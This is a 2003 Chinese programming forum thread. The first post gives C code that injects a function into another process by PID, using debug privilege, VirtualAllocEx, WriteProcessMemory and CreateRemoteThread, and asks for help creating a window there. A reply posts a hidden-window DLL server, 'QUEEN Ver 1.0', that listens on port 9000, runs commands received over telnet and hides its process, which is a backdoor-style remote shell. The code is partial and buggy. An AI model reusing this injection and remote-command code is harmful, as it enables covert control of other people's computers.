|
阅读:1100回复:2
求助远线程问题!!!!
#include <windows.h>
#include #include <stdio.h> typedef HINSTANCE (__stdcall *PLoadLibraryW)(LPCTSTR); typedef FARPROC (__stdcall *PGetProcAddress)(HMODULE, LPCSTR); typedef HINSTANCE (__stdcall *PFreeLibFunc)( HINSTANCE ); typedef ATOM (__stdcall *PRegisterClass) (CONST WNDCLASS); typedef HWND (__stdcall *PCreateWindow) (LPCTSTR,LPCTSTR,DWORD,int,int,int,int, HWND,HMENU,HANDLE,LPVOID); typedef BOOL (__stdcall *PShowWindow) (HWND,int); typedef BOOL (__stdcall *PUpdateWindow) (HWND); typedef BOOL (__stdcall *PGetMessage) (LPMSG,HWND,UINT,UINT); typedef BOOL (__stdcall *PTranslateMessage) (CONST MSG); typedef LONG (__stdcall *PDispatchMessage) (CONST MSG); typedef LRESULT (__stdcall *PDefWindowProc) (HWND,UINT,WPARAM,LPARAM); //--------------------------------------------------------------------------- #include <windows.h> #include #include <stdio.h> #pragma hdrstop //--------------------------------------------------------------------------- #pragma argsused typedef HINSTANCE (__stdcall *PLoadLibraryW)(LPCTSTR); typedef FARPROC (__stdcall *PGetProcAddress)(HMODULE, LPCSTR); typedef HINSTANCE (__stdcall *PFreeLibFunc)( HINSTANCE ); typedef ATOM (__stdcall *PRegisterClass) (CONST WNDCLASS); typedef HWND (__stdcall *PCreateWindow) (LPCTSTR,LPCTSTR,DWORD,int,int,int,int, HWND,HMENU,HANDLE,LPVOID); typedef BOOL (__stdcall *PShowWindow) (HWND,int); typedef BOOL (__stdcall *PUpdateWindow) (HWND); typedef BOOL (__stdcall *PGetMessage) (LPMSG,HWND,UINT,UINT); typedef BOOL (__stdcall *PTranslateMessage) (CONST MSG); typedef LONG (__stdcall *PDispatchMessage) (CONST MSG); typedef LRESULT (__stdcall *PDefWindowProc) (HWND,UINT,WPARAM,LPARAM); typedef struct RT_Tag { POINT point; MSG msg; WNDCLASS wndclass; PLoadLibraryW fnLoadLibrary; PGetProcAddress fnGetProcAddress; PFreeLibFunc fnFreeLibrary; //***********WNDCLASS结构**************** char szclassname[32]; char title[32]; char windowsstyle[32]; char x[32]; char y[32]; char width[32]; char height[32]; char wndparent[32]; char menu[32]; char instance[32]; char param[32]; //***********将要用到的函数**************** char use32[32]; char registerclass[32]; char createwindow[32]; char showwindows[32]; char updatewindow[32]; char getmessage[32]; char translatemessage[32]; char dispatchmessage[32]; } RT; typedef struct WinProc { PLoadLibraryW fnLoadLibrary; PGetProcAddress fnGetProcAddress; PFreeLibFunc fnFreeLibrary; char use32[32]; char defwindowproc[32]; } WP; //--------------------------------------------------------------------------------------- LRESULT CALLBACK WndProc(HWND hwnd,UINT message,WPARAM wParam,LPARAM lParam); int TestClass(RT *p) { HINSTANCE hInstance;HINSTANCE hPrevInstance;LPSTR lpCmdLine;int nShowCmd; HWND hwnd; RT *Run=p; PRegisterClass fnRegisterClass; PCreateWindow fnCreateWindow; PShowWindow fnShowWindow; PUpdateWindow fnUpdateWindow; PGetMessage fnGetMessage; PTranslateMessage fnTranslateMessage; PDispatchMessage fnDispatchMessage; HMODULE huse32=Run->fnLoadLibrary(Run->use32); fnRegisterClass=(PRegisterClass)Run->fnGetProcAddress(huse32,Run->registerclass); fnCreateWindow=(PCreateWindow)Run->fnGetProcAddress(huse32,Run->createwindow); fnShowWindow=(PShowWindow)Run->fnGetProcAddress(huse32,Run->showwindows); fnUpdateWindow=(PUpdateWindow)Run->fnGetProcAddress(huse32,Run->updatewindow); fnGetMessage=(PGetMessage)Run->fnGetProcAddress(huse32,Run->getmessage); fnTranslateMessage=(PTranslateMessage)Run->fnGetProcAddress(huse32,Run->translatemessage); fnDispatchMessage=(PDispatchMessage)Run->fnGetProcAddress(huse32,Run->dispatchmessage); //执行部分 fnRegisterClass(Run->wndclass); hwnd=fnCreateWindow(Run->szclassname,Run->title,(DWORD)Run->windowsstyle, (int)Run->x,(int)Run->y,(int)Run->width,(int)Run->height, Run->wndparent,Run->menu,Run->instance,Run->param); fnShowWindow(hwnd,nShowCmd); fnUpdateWindow(hwnd); while(fnGetMessage(&(Run->msg),NULL,0,0)) { fnTranslateMessage(Run->msg); fnDispatchMessage(Run->msg); } return (Run->msg).wParam; } //-------------------------------------------------------------------------------------------- BOOL EnableDebugPrivilege() { HANDLE hToken; BOOL fOk=FALSE; if(OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken)) { TOKEN_PRIVILEGES tp; tp.PrivilegeCount=1; if(!LookupPrivilegeValue(NULL,SE_DEBUG_NAME,&tp.Privileges[0].Luid)) printf(\"Can‘t lookup privilege value.\\n\"); tp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED; if(!AdjustTokenPrivileges(hToken,FALSE,&tp,sizeof(tp),NULL,NULL)) printf(\"Can‘t adjust privilege value.\\n\"); fOk=(GetLastError()==ERROR_SUCCESS); CloseHandle(hToken); } return fOk; } //--------------------------------------------------------------------------------------------- LRESULT CALLBACK WndProc(HWND hwnd,UINT message,WPARAM wParam,LPARAM lParam) { PDefWindowProc fnDefWindowProc; WP *Run; HMODULE huse32=Run->fnLoadLibrary(Run->use32); fnDefWindowProc=(PDefWindowProc)Run->fnGetProcAddress(huse32,Run->defwindowproc); return fnDefWindowProc(hwnd,message,wParam,lParam); } //--------------------------------------------------------------------------------------------- int main(int argc, char* argv[]) { HANDLE hRemoteProcess; void *pStart,*pcallback; void *pParam,*pcallbackParam; RT RunParam; WP RunCallBack; int iReturnCode,icallbackcode; int cb=(int)EnableDebugPrivilege-(int)TestClass+1024; if(!EnableDebugPrivilege()) printf(\"Can‘t adjust token.\\n\"); hRemoteProcess = OpenProcess( PROCESS_CREATE_THREAD| //允许远程创建线程 PROCESS_VM_OPERATION| //允许远程VM操作 PROCESS_VM_WRITE, //允许远程VM写 FALSE, 2222); if(!hRemoteProcess) { printf(\"Can‘t open the process.\\n\"); return 0; } //Write function itself//写入函数体 pStart = VirtualAllocEx( hRemoteProcess, NULL, cb, MEM_COMMIT, PAGE_EXECUTE_READWRITE); pcallback = VirtualAllocEx( hRemoteProcess, NULL, 4096, MEM_COMMIT, PAGE_EXECUTE_READWRITE); if(!pStart||!pcallback) { printf(\"Can‘t alloc remote memory for function itself.\\n\"); CloseHandle(hRemoteProcess); return 0; } iReturnCode = WriteProcessMemory(hRemoteProcess, pStart, &TestClass/*函数体*/, cb, NULL); icallbackcode = WriteProcessMemory(hRemoteProcess, pcallback, &WndProc/*函数体*/, 4096, NULL); if(!iReturnCode) { printf(\"Can‘t write process memory for function itself.\\n\"); CloseHandle(hRemoteProcess); return 0; } //Set function params//设定函数参数 HMODULE hKernel32 = LoadLibrary( \"kernel32.dll\" ); RunParam.fnLoadLibrary = (PLoadLibraryW)GetProcAddress (hKernel32, \"LoadLibraryA\"); RunParam.fnGetProcAddress = (PGetProcAddress)GetProcAddress (hKernel32, \"GetProcAddress\"); RunParam.fnFreeLibrary = (PFreeLibFunc)GetProcAddress( hKernel32, \"FreeLibrary\" ); //**************************************************************// RunCallBack.fnLoadLibrary = (PLoadLibraryW)GetProcAddress (hKernel32, \"LoadLibraryA\"); RunCallBack.fnGetProcAddress = (PGetProcAddress)GetProcAddress (hKernel32, \"GetProcAddress\"); RunCallBack.fnFreeLibrary = (PFreeLibFunc)GetProcAddress( hKernel32, \"FreeLibrary\" ); strcpy(RunCallBack.use32,\"user32.dll\"); strcpy(RunCallBack.defwindowproc,\"DefWindowProc\"); //**************************************************************// strcpy(RunParam.use32,\"user32.dll\"); strcpy(RunParam.registerclass,\"RegisterClass\"); strcpy(RunParam.createwindow,\"CreateWindow\"); strcpy(RunParam.showwindows,\"ShowWindow\"); strcpy(RunParam.updatewindow,\"UpdateWindow\"); strcpy(RunParam.getmessage,\"GetMessage\"); strcpy(RunParam.translatemessage,\"TranslateMessage\"); strcpy(RunParam.dispatchmessage,\"DispatchMessage\"); //------------WNDCLASS结构初始化-------------// RunParam.wndclass.style=CS_HREDRAW | CS_VREDRAW; RunParam.wndclass.lpfnWndProc=pcallback; //这里书上说要指向窗口过程处理函数的地址,我不知该怎样写!!! RunParam.wndclass.cbClsExtra=0; RunParam.wndclass.cbWndExtra=0; RunParam.wndclass.hInstance=hInstance;//实例句柄,我不知该如何确定!!! RunParam.wndclass.hIcon=LoadIcon(NULL,IDI_APPLICATION); RunParam.wndclass.hCursor=LoadCursor(NULL,IDC_ARROW); RunParam.wndclass.hbrBackground=(HBRUSH)GetStockObject(WHITE_BRUSH); RunParam.wndclass.lpszMenuName=NULL; RunParam.wndclass.lpszClassName=RunParam.szclassname; //------------CreateWindow初始化-------------// strcpy(RunParam.szclassname,\"HelloWinClass\"); strcpy(RunParam.title,\"The HelloWin program\"); strcpy(RunParam.windowsstyle,\"WS_OVERLAPPEDWINDOW\"); strcpy(RunParam.x,\"CW_USEDEFAULT\"); strcpy(RunParam.y,\"CW_USEDEFAULT\"); strcpy(RunParam.width,\"CW_USEDEFAULT\"); strcpy(RunParam.height,\"CW_USEDEFAULT\"); strcpy(RunParam.wndparent,\"NULL\"); strcpy(RunParam.menu,\"NULL\"); strcpy(RunParam.instance,\"hInstance\"); strcpy(RunParam.param,\"NULL\"); //Write function params//写入函数参数 pParam = VirtualAllocEx( hRemoteProcess, NULL, sizeof(RT), MEM_COMMIT, PAGE_EXECUTE_READWRITE); pcallbackParam = VirtualAllocEx( hRemoteProcess, NULL, sizeof(WP), MEM_COMMIT, PAGE_EXECUTE_READWRITE); if(!pParam) { printf(\"Can‘t alloc remote memory for function params.\\n\"); CloseHandle(hRemoteProcess); return 0; } iReturnCode = WriteProcessMemory(hRemoteProcess, pParam, &RunParam, /*此处为RT结构*/ sizeof(RT), NULL); icallbackcode = WriteProcessMemory(hRemoteProcess, pParam, &RunCallBack, sizeof(RT),NULL); if(!iReturnCode||!icallbackcode) { printf(\"Can‘t write process memory for function param.\\n\"); CloseHandle(hRemoteProcess); return 0; } HANDLE hRemoteThread = CreateRemoteThread( hRemoteProcess, NULL, 0, (PTHREAD_START_ROUTINE)pStart,//写入函数体时分配的地址 pParam,//函数参数地址 0, NULL); HANDLE hCallBackThread=CreateRemoteThread( hRemoteProcess, NULL, 0, (PTHREAD_START_ROUTINE)pcallback,//写入函数体时分配的地址 pcallbackParam,//函数参数地址 0, NULL); if(!hRemoteThread||!hCallBackThread) { printf(\"Can‘t create remote thread.\\n\"); CloseHandle(hRemoteProcess); return 0; } FreeLibrary(hKernel32); CloseHandle(hRemoteProcess); CloseHandle(hRemoteThread); printf(\"Inject success!\\n\"); return 0; } //------------------------------------------------------------------------ 这段是我写的在远线程中建立窗口的代码,我有几点不明 1,WNDCLASS结构中的lpfnWndProc参数书上说要指向窗口过程处理函数的地址,但在远线程中我不知该怎样写 2,WNDCLASS结构中的hInstance参数,是一个实例句柄,该如何确定??? 3,窗口处理函数LRESULT CALLBACK WndProc似乎不能这么写,请问该怎么写????? 4,我的WP *Run的负了值了!!在这里------ WP RunCallBack; RunCallBack.fnLoadLibrary = (PLoadLibraryW)GetProcAddress (hKernel32, \"LoadLibraryA\"); RunCallBack.fnGetProcAddress = (PGetProcAddress)GetProcAddress (hKernel32, \"GetProcAddress\"); RunCallBack.fnFreeLibrary = (PFreeLibFunc)GetProcAddress( hKernel32, \"FreeLibrary\" ); strcpy(RunCallBack.use32,\"user32.dll\"); strcpy(RunCallBack.defwindowproc,\"DefWindowProc\"); 不过我一直没办法把值传进去!!!(众人狂倒ing~~~~~~~~) 应该是像TessClass里一样把WndProc 写成WndProc(WP *p)然后再在里面用WP *RUN=p;这就可以完成了, 不过不能这么写!!! 郁闷!!!! 请问该怎么写?????? |
|
|
沙发#
发布于:2003-01-19 22:48
创建REMOTE THREAD本身会将你的DLL LOAD到目标进程中. 而REMOTE THREAD的启动地址是你传入的参数地址. 如果你的DLL没有LOAD到预定的位置, 那就无法正常工作. 我的做法是自己的DLL一定要选择一个比较生僻的BASE ADDRESS. 然后当KERNEL32将你的DLL加载的TARGET PROCESS时,才不会出错. 至于其他东西, 照常写就可.
|
|
|
|
板凳#
发布于:2003-01-22 21:52
我写的一个网络通讯的服务器端程序, 我先把他写成了一个EXE, 并且测试通过, 现我把他在EXE的基础上改写为DLL, 问题来了, 我用rundll32命令运行了其中的WinMain函数, 结果是我预定义的端口9000是开放了,
(我用扫瞄器扫过,而且Telnet也可以连上),不过不处理命令,我是用Telnet连上的,用Telnet 127.0.0.1 9000连上后DOS窗口一片黑,无任何显示,而在我用此代码的EXE版测试时,一连上就有我自定义的QUEEN Ver 1.0 Write by NOIR 提示符(前面已说过EXE测试通过),而且无论我在键盘上敲什么,DOS窗口就是定在那,什么反应都没有,请帮我看看示那个地方不对, 这里给出我程序的主要部分,前面都是一些处理操作的函数,太长就不贴出了, //--------------------------------------------------------------------------- // InitSocket // 初始化SOCKET //-------------------------------------------------------------------------- extern \"C\" __declspec(dllexport) BOOL WINAPI InitSocket(HWND hWnd) { if((WSAStartup(dwVersion,&wsaData))!=0) { MessageBox(hWnd,\"INIT SOCKET ERROR\",NULL,MB_OK); return FALSE; } CreateSock=socket(AF_INET,SOCK_STREAM,0);//用来创建一个套接字,成功返回新套接字的描述字 if(CreateSock==SOCKET_ERROR) { closesocket(CreateSock); MessageBox(hWnd,\"SOCKET ERROR\",NULL,MB_OK); return FALSE; } Sock_in.sin_family=AF_INET; Sock_in.sin_port=htons(PORT); Sock_in.sin_addr.S_un.S_addr=htonl(INADDR_ANY); setsockopt(CreateSock,SOL_SOCKET,SO_REUSEADDR,(LPSTR)&dwFlag,sizeof(dwFlag)); if(bind(CreateSock,(LPSOCKADDR)&Sock_in,sizeof(Sock_in))==SOCKET_ERROR) { closesocket(CreateSock); MessageBox(hWnd,\"BIND ERROR\",NULL,MB_OK); return FALSE; } else if(listen(CreateSock,3)==SOCKET_ERROR) { closesocket(CreateSock); MessageBox(hWnd,\"LISTEN ERROR\",NULL,MB_OK); return FALSE; } else if(WSAAsyncSelect(CreateSock,hWnd,WM_SOCKET,FD_ACCEPT|FD_CLOSE)==SOCKET_ERROR)//008.pdf->p8 { closesocket(CreateSock); MessageBox(hWnd,\"WSASelect ERROR\",NULL,MB_OK); return FALSE; } addrlen=sizeof(SOCKADDR_IN); return TRUE; } //--------------------------------------------------------------------------- extern \"C\" __declspec(dllexport) LRESULT CALLBACK WndProc(HWND hWnd,UINT message,WPARAM wParam,LPARAM lParam) { static TCHAR szCommand[dwComm]; static TCHAR szExec[dwComm]; switch(message) { case WM_SOCKET: if(WSAGETSELECTERROR(lParam)) { closesocket(wParam); break; } switch(WSAGETSELECTEVENT(lParam)) { //连接 case FD_ACCEPT: NewSock=accept(CreateSock,(LPSOCKADDR)&NewSock_in,&addrlen); WSAAsyncSelect(NewSock,hWnd,WM_SOCKET,FD_READ|FD_WRITE|FD_CLOSE); wsprintf(szCommand,\"QUEEN Ver 1.0 Write by NOIR\\n\\n\\r%s\",PROMPT); send(NewSock,szCommand,dwComm,0); break; //读取输入,如是回车则执行命令 //不是将输入复制到缓冲区 case FD_READ: ZeroMemory(szCommand,dwComm); recv(NewSock,szCommand,dwComm,0); if(szCommand[0]==VK_RETURN) { wsprintf(szCommand,\"\\n\\n\\r%s\",PROMPT); send(NewSock,szCommand,dwComm,0); ExeCommand(szExec,hWnd); ZeroMemory(szExec,dwComm); } else lstrcat(szExec,szCommand); send(NewSock,szCommand,dwComm,0); break; case FD_CLOSE: closesocket(wParam); break; } break; case WM_DESTROY: HideProc(UNSERVICE_PROC); PostQuitMessage(0); break; default: return DefWindowProc(hWnd,message,wParam,lParam); } return 0; } //--------------------------------------------------------------------------- extern \"C\" __declspec(dllexport) WINAPI WinMain(HINSTANCE , HINSTANCE, LPSTR, int) { HWND hWnd; MSG msg; WNDCLASS wndc; LPSTR szAppName=\"LANLAN\"; HKEY hKey=0; DWORD disp=0; LONG lResult; TCHAR szKey[MAX_PATH]; TCHAR szSysDir[MAX_PATH+25]; TCHAR szFileName[MAX_PATH]; wndc.style=0; wndc.lpfnWndProc=WndProc; wndc.cbClsExtra=0; wndc.cbWndExtra=0; wndc.hInstance=NULL; wndc.hIcon=LoadIcon(NULL,IDI_APPLICATION); wndc.hCursor=LoadCursor(NULL,IDC_ARROW); wndc.hbrBackground=(HBRUSH)(COLOR_WINDOW+1); wndc.lpszMenuName=NULL; wndc.lpszClassName=szAppName; RegisterClass(&wndc); hWnd=CreateWindow(szAppName,\"LANLANServer\", WS_OVERLAPPEDWINDOW, CW_USEDEFAULT,CW_USEDEFAULT, CW_USEDEFAULT,CW_USEDEFAULT, NULL,NULL,NULL,NULL); ShowWindow(hWnd,SW_HIDE); UpdateWindow(hWnd); InitSocket(hWnd); while(GetMessage(&msg,NULL,0,0)) { TranslateMessage(&msg); DispatchMessage(&msg); } return (msg.wParam); } //---------------------------------------------------------------------------------------------- int WINAPI DllEntryPoint(HINSTANCE hinst, unsigned long reason, void* lpReserved) { LPSTR lpCmdLine=GetCommandLine(); if(reason==DLL_PROCESS_ATTACH) WinMain(hinst,//当前的实例句柄 NULL,//总为NULL lpCmdLine,//命令行参数,由GetCommandLine()得到 SW_SHOW);//窗口显示方式 return 1; } //--------------------------------------------------------------------------- |
|